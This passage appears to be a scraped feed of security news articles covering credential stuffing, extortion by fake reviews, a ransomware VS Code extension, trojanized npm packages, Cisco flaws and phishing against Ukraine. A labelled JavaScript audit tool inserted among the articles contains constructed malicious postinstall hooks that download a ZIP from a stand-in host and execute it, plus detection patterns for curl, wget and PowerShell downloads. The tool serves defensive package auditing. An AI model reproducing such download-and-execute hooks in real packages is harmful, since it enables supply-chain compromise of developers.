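        "2025-11-07T09:05:40Z ip=198.51.100.20 user=sarah@example.com result=OK",
        "garbage line that should be ignored",
    ]
    return lines


if __name__ == "__main__":
    for ip, alert in detect_stuffing(build_sample()).items():
        print(ip, alert)
```

    Sarah’s two failed attempts from the office range do not trip the rule because they hit one account; the stuffing source does, and its single success is the account to lock and reset before the buyer of that credential logs in.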

    The criminal ecosystem

    Just like a car theft ring has different players — from the street-level thieves grabbing cars to the chop shop operators and overseas exporters — the credential theft ecosystem has bad actors who want different things from your stolen credentials. But knowing their game can help you better defend your organization.

    Opportunistic fraudsters want quick cash. They’ll drain bank accounts, make fraudulent purchases, or steal crypto. They aren’t picky – if your business credentials work on consumer sites, they’ll use them.

    Automated botnets are credential-testing machines that never sleep. They throw millions of username/password combos at thousands of websites, looking for anything that sticks. The name of their game is volume, not precision.

    Then criminal marketplaces act as middlemen who buy stolen credentials in bulk and resell them to end users. Think of them as the eBay of cybercrime, with search functions that let buyers easily hunt for your organization’s data.

    Organized crime groups treat your credentials like strategic weapons. They’ll sit on access for months, mapping your network and planning big-ticket attacks like ransomware or IP theft. These are the kind of professionals who turn single credential compromises into million-dollar disasters.

    Real-world impact

    Once attackers get their hands on a set of working credentials, the damage starts fast and spreads everywhere:

    • Account takeover: Hackers waltz right past your security controls with legitimate access. They’re reading emails, grabbing customer data, and sending messages that look like they’re coming from your employees.
    • Lateral movement: One compromised account quickly becomes ten, then fifty. Attackers hop through your network, escalating privileges and mapping out your most valuable systems.
    • Data theft: Attackers focus on identifying your crown jewels — customer databases, financial records, trade secrets — and siphoning them off through channels that appear normal to your monitoring tools.
    • Resource abuse: Your cloud bill explodes as attackers spin up crypto mining operations, send spam through your email systems, or burn through API quotas for their own projects.
    • Ransomware deployment: If hackers are looking for a major payout, they often turn to ransomware. They encrypt everything important and demand payment, knowing you’ll likely pay because restoration from backups takes forever — and is far from a cheap process.

    But that’s just the beginning. You could also be looking at regulatory fines, lawsuits, massive remediation costs, and a reputation that takes years to rebuild. In fact, many organizations never fully recover from a major credential compromise incident.

    Take action now

    The reality is that some of your company’s user credentials are likely already compromised. And the longer the exposed credentials sit out undetected, the bigger the target on your back.

    Make it a priority to find your compromised credentials before the criminals use them. For example, Outpost24’s Credential Checker is a free tool that shows you how often your company’s email domain appears in leak repositories, observed channels or underground marketplaces. This no-cost, no-registration check doesn’t display or save individual compromised credentials; it simply makes you aware of your level of risk. Check your domain for leaked credentials now.

    This article is a contributed piece from one of our valued partners.


    Source: thehackernews.com…

  • Google Launches New Maps Feature to Help Businesses Report Review-Based Extortion Attempts

    Google Launches New Maps Feature to Help Businesses Report Review-Based Extortion Attempts

    Nov 07, 2025Ravie LakshmananData Protection / Malware

    Google on Thursday said it’s rolling out a dedicated form to allow businesses listed on Google Maps to report extortion attempts made by threat actors who post inauthentic bad reviews on the platform and demand ransoms to remove the negative comments.

    The approach is designed to tackle a common practice called review bombing, where online users intentionally post negative user reviews in an attempt to harm a product, a service, or a business.

    “Bad actors try to circumvent our moderation systems and flood a business’s profile with fake one-star reviews,” Laurie Richardson, vice president of Trust & Safety at Google, said. “Following this initial attack, the scammers directly contact the business owner, often through third-party messaging apps, to demand payment.”

    The threat actors warn of further escalation should the victim fail to pay the fee, risking potential damage to their public rating and reputation. These ploys are seen as an attempt to coerce merchants into paying the extortion demand.

    Google has also warned users of other kinds of scams that are prevalent today –

    • Online job scams, where fraudsters impersonate legitimate job boards to target people looking for employment using fake postings and recruiter profiles to trick them into providing sensitive data under the pretext of filling fake application forms and video interviews, or downloading malware like remote access trojans (RATs) or information stealers.
    • AI product impersonation scams, which involve capitalizing on the popularity surrounding artificial intelligence (AI) tools to impersonate and promote popular AI services using malvertising, hijacked social media accounts, and trojanized open-source repositories that promise “free” or “exclusive” access in order to trap victims into downloading malicious mobile and desktop apps, “fleeceware” apps with hidden subscriptions, and bogus browser extensions.
    • Malicious VPN apps and extensions, where threat actors distribute malicious applications disguised as legitimate VPN services across platforms using social engineering lures that leverage geopolitical events to ensnare victims who are seeking secure internet access. Once installed, these apps can act as a conduit for other payloads like information stealers, RATs, and banking malware that can steal data and drain funds from cryptocurrency wallets.
    • Fraud recovery scams, which involve targeting individuals who have already been scammed by posing as asset recovery agents associated with trusted entities like law firms and government agencies, only to scam them a second time. It’s worth noting that the U.S. Federal Bureau of Investigation (FBI) issued a bulletin about this threat back in August 2025.
    • Seasonal holiday scams, where threat actors exploit major holiday and shopping periods to deceive unsuspecting shoppers with counterfeit offers on social media platforms that lead to financial fraud and data theft.

    To counter these schemes, users are advised to be wary of unexpected delivery texts or emails that demand a fee, exercise caution when approached by people who claim they can recover funds, download apps only from trusted sources and legitimate developers, and be vigilant when asked to fill out sensitive personal information.

    The development coincides with a report from Reuters, which found that Meta is making billions of dollars every year from ads marketing scams and illegal products on its platforms. Citing an internal December 2024 document, the British news agency said scam ads could account for as much as 10.1% of the company's overall revenue, or approximately $16 billion.

    Meta allowed “high value accounts” to “accrue more than 500 strikes without Meta shutting them down,” Reuters reported, adding “a small advertiser would have to get flagged for promoting financial fraud at least eight times before Meta blocked it.”

    In addition, the company is said to have charged bad actors higher ad rates as a penalty as they accrued more strikes, only banning advertisers once its automated systems were at least 95% certain they were committing fraud. Meta is estimated to have served its platforms' users about 15 billion “higher risk” scam advertisements every day.

    In response, Meta said the 10.1% estimate was rough and overly-inclusive, and that it has removed more than 134 million pieces of scam ad content so far in 2025.


    Source: thehackernews.com…

  • Vibe-Coded Malicious VS Code Extension Found with Built-In Ransomware Capabilities

    Cybersecurity researchers have flagged a malicious Visual Studio Code (VS Code) extension with basic ransomware capabilities that appears to be created with the help of artificial intelligence – in other words, vibe-coded.

    Secure Annex researcher John Tuckner, who flagged the extension “susvsex,” said it does not attempt to hide its malicious functionality. The extension was uploaded on November 5, 2025, by a user named “suspublisher18” along with the description “Just testing” and the email address “donotsupport@example[.]com.”

    “Automatically zips, uploads, and encrypts files from C:\Users\Public\testing (Windows) or /tmp/testing (macOS) on first launch,” reads the description of the extension. As of November 6, Microsoft has stepped in to remove it from the official VS Code Extension Marketplace.

    According to details shared by “suspublisher18,” the extension is designed to activate on any event, including installation or VS Code launch, and invoke a function named “zipUploadAndEncrypt,” which creates a ZIP archive of a target directory, exfiltrates it to a remote server, and replaces the files with their encrypted versions.

    “Fortunately, the TARGET_DIRECTORY is configured to be a test staging directory so it would have little impact right now, but is easily updated with an extension release or as a command sent through the C2 channel covered next,” Tuckner said.

    Besides encryption, the malicious extension also uses GitHub as command-and-control (C2) by polling a private GitHub repository for any new commands to be executed by parsing the “index.html” file. The results of the command execution are written back to the same repository in the “requirements.txt” file using a GitHub access token embedded in the code.

    The GitHub account associated with the repository – aykhanmv – continues to be active, with the developer claiming to be from the city of Baku, Azerbaijan.

    “Extraneous comments which detail functionality, README files with execution instructions, and placeholder variables are clear signs of ‘vibe coded’ malware,” Tuckner said. “The extension package accidentally included decryption tools, command and control server code, GitHub access keys to the C2 server, which other people could use to take over the C2.”

    Trojanized npm Packages Drop Vidar Infostealer

    The disclosure comes as Datadog Security Labs unearthed 17 npm packages that masquerade as benign software development kits (SDKs) and provide the advertised functionality, but are engineered to stealthily execute Vidar Stealer on infected systems. The development marks the first time the information stealer has been distributed via the npm registry.

    The cybersecurity company, which is tracking the cluster under the name MUT-4831, said some of the packages were first flagged on October 21, 2025, with subsequent uploads recorded the next day and on October 26. The names of the packages, published by accounts named “aartje” and “saliii229911,” are below –

    • abeya-tg-api
    • bael-god-admin
    • bael-god-api
    • bael-god-thanks
    • botty-fork-baby
    • cursor-ai-fork
    • cursor-app-fork
    • custom-telegram-bot-api
    • custom-tg-bot-plan
    • icon-react-fork
    • react-icon-pkg
    • sabaoa-tg-api
    • sabay-tg-api
    • sai-tg-api
    • salli-tg-api
    • telegram-bot-start
    • telegram-bot-starter

    While the two accounts have since been banned, the libraries were downloaded at least 2,240 times before they were taken down. That said, Datadog noted that many of these downloads were likely the result of automated scrapers.

    The attack chain itself is fairly straightforward, kicking in as part of a postinstall script specified in the “package.json” file that downloads a ZIP archive from an external server (a bullethost[.]cloud domain) and executes the Vidar executable contained within the ZIP file. The Vidar 2.0 samples have been found to use hard-coded Telegram and Steam accounts as dead drop resolvers to fetch the actual C2 server.

    In some variants, a post-install PowerShell script, embedded directly in the package.json file, is used to download the ZIP archive, after which the execution control is passed to a JavaScript file to complete the rest of the steps in the attack.

    “It is not clear why MUT-4831 chose to vary the postinstall script in this way,” security researchers Tesnim Hamdouni, Ian Kretz, and Sebastian Obregoso said. “One possible explanation is that diversifying implementations can be advantageous to the threat actor in terms of surviving detection.”

    The discovery is just another in a long list of supply chain attacks targeting the open-source ecosystem spanning npm, PyPI, RubyGems, and Open VSX, making it crucial that developers perform due diligence, review changelogs, and watch out for techniques like typosquatting and dependency confusion before installing packages.
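    Both MUT-4831 variants hinge on npm lifecycle hooks: a postinstall that runs a downloader script, or PowerShell embedded in package.json itself. The audit below is an added example, not code from Datadog's report or from the packages above. It reads a package.json and any JavaScript files its hooks invoke, flags download, unpack and execute behaviour in either place, and rates the package. The package names, script contents and the downloads.example host are constructed for the demonstration; the signal list is this example's own heuristic.

```javascript
// Added example: lifecycle-script audit for an npm package. Not Datadog's code
// and not from the MUT-4831 packages; signals and risk levels are this example's own.
const LIFECYCLE = ['preinstall', 'install', 'postinstall', 'prepare', 'preuninstall', 'postuninstall'];

// Signals looked for in the hook command line itself (package.json "scripts").
const SCRIPT_SIGNALS = [
  [/\bpowershell(\.exe)?\b|\bpwsh\b/i, 'invokes PowerShell from a lifecycle hook'],
  [/-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{40,}/i, 'passes a base64-encoded PowerShell command'],
  [/Invoke-WebRequest|Invoke-RestMethod|\biwr\b|\bcurl\b|\bwget\b|DownloadFile|DownloadString/i, 'downloads a remote payload'],
  [/\bnode\s+(-e|--eval)\b/, 'evaluates inline JavaScript with node -e'],
  [/Expand-Archive|\bunzip\b|\btar\b\s+-?x/i, 'unpacks an archive at install time'],
  [/Start-Process|\bcmd(\.exe)?\s+\/c\b|\bexec\s*\(/i, 'executes a file at install time'],
];

// Signals looked for inside JavaScript files the hooks hand off to.
const SOURCE_SIGNALS = [
  [/\bhttps?\.(get|request)\s*\(|\bfetch\s*\(|\baxios\b/, 'fetches a remote resource'],
  [/\bchild_process\b|\b(exec|execFile|spawn)(Sync)?\s*\(/, 'spawns a process'],
  [/\b(adm-zip|AdmZip|unzipper|extract-zip)\b|\.zip\b/i, 'handles a ZIP archive'],
];

// pkg: parsed package.json; files: map of relative path -> file contents from the
// unpacked tarball. Returns per-hook and per-file signals plus an overall risk.
function auditPackage(pkg, files = {}) {
  const hooks = [];
  const referenced = [];
  for (const hook of LIFECYCLE) {
    const command = pkg.scripts && pkg.scripts[hook];
    if (!command) continue;
    hooks.push({ hook, command, signals: SCRIPT_SIGNALS.filter(([re]) => re.test(command)).map(([, why]) => why) });
    // Follow "node <file>.js" so a hook that merely looks like "node scripts/setup.js"
    // is judged by what that file does, not by the innocuous command line.
    for (const m of command.matchAll(/\bnode\s+(["']?)([^\s"'&|;]+\.[cm]?js)\1/g)) referenced.push(m[2]);
  }
  const scanned = referenced.map((path) => ({
    path,
    present: path in files,
    signals: SOURCE_SIGNALS.filter(([re]) => re.test(files[path] || '')).map(([, why]) => why),
  }));
  const all = [...hooks.flatMap((h) => h.signals), ...scanned.flatMap((f) => f.signals)];
  const downloads = all.some((s) => /downloads|fetches/.test(s));
  const executes = all.some((s) => /executes|spawns|PowerShell/.test(s));
  const risk = hooks.length === 0 ? 'none' : downloads && executes ? 'high' : all.length ? 'medium' : 'low';
  return { name: pkg.name, risk, hooks, files: scanned };
}

// Variant 1 (constructed): the hook line looks harmless; the referenced file does the work.
const VARIANT_FILE_HOOK = { name: 'sample-tg-api', version: '1.0.2', scripts: { postinstall: 'node scripts/setup.js' } };
const VARIANT_FILE_HOOK_FILES = {
  'scripts/setup.js': `
const https = require('https');
const fs = require('fs');
const AdmZip = require('adm-zip');
const { execFileSync } = require('child_process');
https.get('https://downloads.example/sdk.zip', (res) => {
  const out = fs.createWriteStream('sdk.zip');
  res.pipe(out).on('finish', () => {
    new AdmZip('sdk.zip').extractAllTo('sdk', true);
    execFileSync('sdk/update.exe');
  });
});`,
};

// Variant 2 (constructed): PowerShell embedded in package.json, then a short JS stage.
const VARIANT_INLINE_PS = { name: 'sample-tg-bot-start', version: '2.0.0', scripts: {
  postinstall: 'powershell -NoProfile -Command "Invoke-WebRequest https://downloads.example/sdk.zip -OutFile sdk.zip; Expand-Archive sdk.zip -DestinationPath sdk" && node scripts/run.js',
} };
const VARIANT_INLINE_PS_FILES = {
  'scripts/run.js': `const { execFileSync } = require('child_process');\nexecFileSync('sdk/update.exe');`,
};

// A constructed package with no lifecycle hooks at all.
const BENIGN = { name: 'sample-icons', version: '1.0.0', scripts: { build: 'tsc -p .', test: 'node --test' } };

for (const [pkg, files] of [[VARIANT_FILE_HOOK, VARIANT_FILE_HOOK_FILES], [VARIANT_INLINE_PS, VARIANT_INLINE_PS_FILES], [BENIGN, {}]]) {
  console.log(JSON.stringify(auditPackage(pkg, files), null, 2));
}
```

    To run this against a real package, fetch the tarball with `npm pack <name>` (which does not execute the package's own hooks), unpack it, and pass its package.json and the referenced script files to `auditPackage`. Installing with `npm install --ignore-scripts` (or `npm config set ignore-scripts true`) stops such hooks from running at all, at the cost of breaking packages that legitimately compile native code on install, so it pairs best with an audit like this rather than replacing one.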


    Source: thehackernews.com…

  • Cisco Warns of New Firewall Attack Exploiting CVE-2025-20333 and CVE-2025-20362

    Nov 06, 2025 | Ravie Lakshmanan | Zero-Day / Vulnerability

    Cisco on Wednesday disclosed that it became aware of a new attack variant that’s designed to target devices running Cisco Secure Firewall Adaptive Security Appliance (ASA) Software and Cisco Secure Firewall Threat Defense (FTD) Software releases that are susceptible to CVE-2025-20333 and CVE-2025-20362.

    “This attack can cause unpatched devices to unexpectedly reload, leading to denial-of-service (DoS) conditions,” the company said in an updated advisory, urging customers to apply the updates as soon as possible.

    Both vulnerabilities were disclosed in late September 2025, but not before they were exploited as zero-day vulnerabilities in attacks delivering malware such as RayInitiator and LINE VIPER, according to the U.K. National Cyber Security Centre (NCSC).

    While successful exploitation of CVE-2025-20333 allows an attacker to execute arbitrary code as root using crafted HTTP requests, CVE-2025-20362 makes it possible to access a restricted URL without authentication.

    The update comes as Cisco addressed two critical security flaws in Unified Contact Center Express (Unified CCX) that could permit an unauthenticated, remote attacker to upload arbitrary files, bypass authentication, execute arbitrary commands, and elevate privileges to root.

    The networking equipment major credited security researcher Jahmel Harris for discovering and reporting the shortcomings. The vulnerabilities are listed below –

    • CVE-2025-20354 (CVSS score: 9.8) – A vulnerability in the Java Remote Method Invocation (RMI) process of Unified CCX that allows an attacker to upload arbitrary files and execute arbitrary commands with root permissions on an affected system.
    • CVE-2025-20358 (CVSS score: 9.4) – A vulnerability in the Contact Center Express (CCX) Editor application of Unified CCX that allows an attacker to bypass authentication and obtain administrative permissions to create arbitrary scripts on the underlying operating system and execute them.

    They have been addressed in the following versions –

    • Cisco Unified CCX Release 12.5 SU3 and earlier (Fixed in 12.5 SU3 ES07)
    • Cisco Unified CCX Release 15.0 (Fixed in 15.0 ES01)

    In addition to the two vulnerabilities, Cisco has shipped patches for a high-severity DoS bug (CVE-2025-20343, CVSS score: 8.6) in Identity Services Engine (ISE) that could allow an unauthenticated, remote attacker to cause a susceptible device to restart unexpectedly.

    “This vulnerability is due to a logic error when processing a RADIUS access request for a MAC address that is already a rejected endpoint,” it said. “An attacker could exploit this vulnerability by sending a specific sequence of multiple crafted RADIUS access request messages to Cisco ISE.”

    While there is no evidence that any of the three security flaws have been exploited in the wild, it’s essential that users apply the updates as soon as possible for optimal protection.


    Source: thehackernews.com…

  • Trojanized ESET Installers Drop Kalambur Backdoor in Phishing Attacks on Ukraine

    Nov 06, 2025 | Ravie Lakshmanan | Malware / Vulnerability

    A previously unknown threat activity cluster has been observed impersonating Slovak cybersecurity company ESET as part of phishing attacks targeting Ukrainian entities.

    The campaign, detected in May 2025, is tracked by ESET under the moniker InedibleOchotense and described as Russia-aligned.

    “InedibleOchotense sent spear-phishing emails and Signal text messages, containing a link to a trojanized ESET installer, to multiple Ukrainian entities,” ESET said in its APT Activity Report Q2 2025–Q3 2025 shared with The Hacker News.

    InedibleOchotense is assessed to share tactical overlaps with a campaign documented by EclecticIQ, which involved the deployment of a backdoor called BACKORDER, and with activity tracked by CERT-UA as UAC-0212, which CERT-UA describes as a sub-cluster within the Sandworm (aka APT44) hacking group.

    While the email message is written in Ukrainian, ESET said the first line uses a Russian word, likely indicating a typo or a translation error. The email, which purports to be from ESET, claims the company's monitoring team detected a suspicious process associated with the recipient's email address and that their computer might be at risk.

    The activity is an attempt to capitalize on the widespread use of ESET software in the country and its brand reputation to trick recipients into installing malicious installers hosted on domains such as esetsmart[.]com, esetscanner[.]com, and esetremover[.]com.

    The installer is designed to deliver the legitimate ESET AV Remover, alongside a variant of a C# backdoor dubbed Kalambur (aka SUMBUR), which uses the Tor anonymity network for command-and-control. It’s also capable of dropping OpenSSH and enabling remote access via the Remote Desktop Protocol (RDP) on port 3389.

    It’s worth noting that CERT-UA, in a report published last month, attributed a nearly identical campaign to UAC-0125, another sub-cluster within Sandworm.

    Sandworm Wiper Attacks in Ukraine

    Sandworm, per ESET, has continued to mount destructive campaigns in Ukraine, deploying two wipers tracked as ZEROLOT and Sting against an unnamed university in April 2025, followed by multiple data-wiping malware variants targeting the government, energy, logistics, and grain sectors.

    “During this period, we observed and confirmed that the UAC-0099 group conducted initial access operations and subsequently transferred validated targets to Sandworm for follow-up activity,” the company said. “These destructive attacks by Sandworm are a reminder that wipers very much remain a frequent tool of Russia-aligned threat actors in Ukraine.”

    RomCom Exploits WinRAR 0-Day in Attacks

    Another Russia-aligned threat actor of note that has been active during the time period is RomCom (aka Storm-0978, Tropical Scorpius, UNC2596, or Void Rabisu), which launched spear-phishing campaigns in mid-July 2025 that weaponized a WinRAR vulnerability (CVE-2025-8088, CVSS score: 8.8) as part of attacks targeting financial, manufacturing, defense, and logistics companies in Europe and Canada.

    “Successful exploitation attempts delivered various backdoors used by the RomCom group, specifically a SnipBot [aka SingleCamper or RomCom RAT 5.0] variant, RustyClaw, and a Mythic agent,” ESET said.

    In a detailed profile of RomCom in late September 2025, AttackIQ characterized the hacking group as closely keeping an eye out for geopolitical developments surrounding the war in Ukraine, and leveraging them to carry out credential harvesting and data exfiltration activities likely in support of Russian objectives.

    “RomCom was initially developed as an e-crime commodity malware, engineered to facilitate the deployment and persistence of malicious payloads, enabling its integration into prominent and extortion-focused ransomware operations,” security researcher Francis Guibernau said. “RomCom transitioned from a purely profit-driven commodity to become a utility leveraged in nation-state operations.”


    Source: thehackernews.com…

  • ThreatsDay Bulletin: AI Tools in Malware, Botnets, GDI Flaws, Election Attacks & More

    Nov 06, 2025 | Ravie Lakshmanan | Cybersecurity / Hacking News

    Cybercrime has stopped being a problem of just the internet — it’s becoming a problem of the real world. Online scams now fund organized crime, hackers rent violence like a service, and even trusted apps or social platforms are turning into attack vectors.

    The result is a global system where every digital weakness can be turned into physical harm, economic loss, or political leverage. Understanding these links is no longer optional — it’s survival.

    For a full look at the most important security news stories of the week, keep reading.

    1. AI speeds triage but human skill still needed

      Check Point has demonstrated a way to use ChatGPT for malware analysis that tips the balance when taking apart sophisticated trojans like XLoader, whose code decrypts only at runtime and is protected by multiple layers of encryption. Specifically, the research found that cloud-based static analysis with ChatGPT can be combined with the Model Context Protocol (MCP) for runtime key extraction and live-debugging validation. “The use of AI doesn’t eliminate the need for human expertise,” security researcher Alexey Bukhteyev said. “XLoader’s most sophisticated protections, such as scattered key derivation logic and multi-layer function encryption, still require manual analysis and targeted adjustments. But the heavy lifting of triage, deobfuscation, and scripting can now be accelerated dramatically. What once took days can now be compressed into hours.”

    Every hack or scam has one thing in common — someone takes advantage of trust. As security teams improve their defenses, attackers quickly find new tricks. The best way to stay ahead isn’t to panic, but to stay informed, keep learning, and stay alert.

    Cybersecurity keeps changing fast — and our understanding needs to keep up.


    Source: thehackernews.com…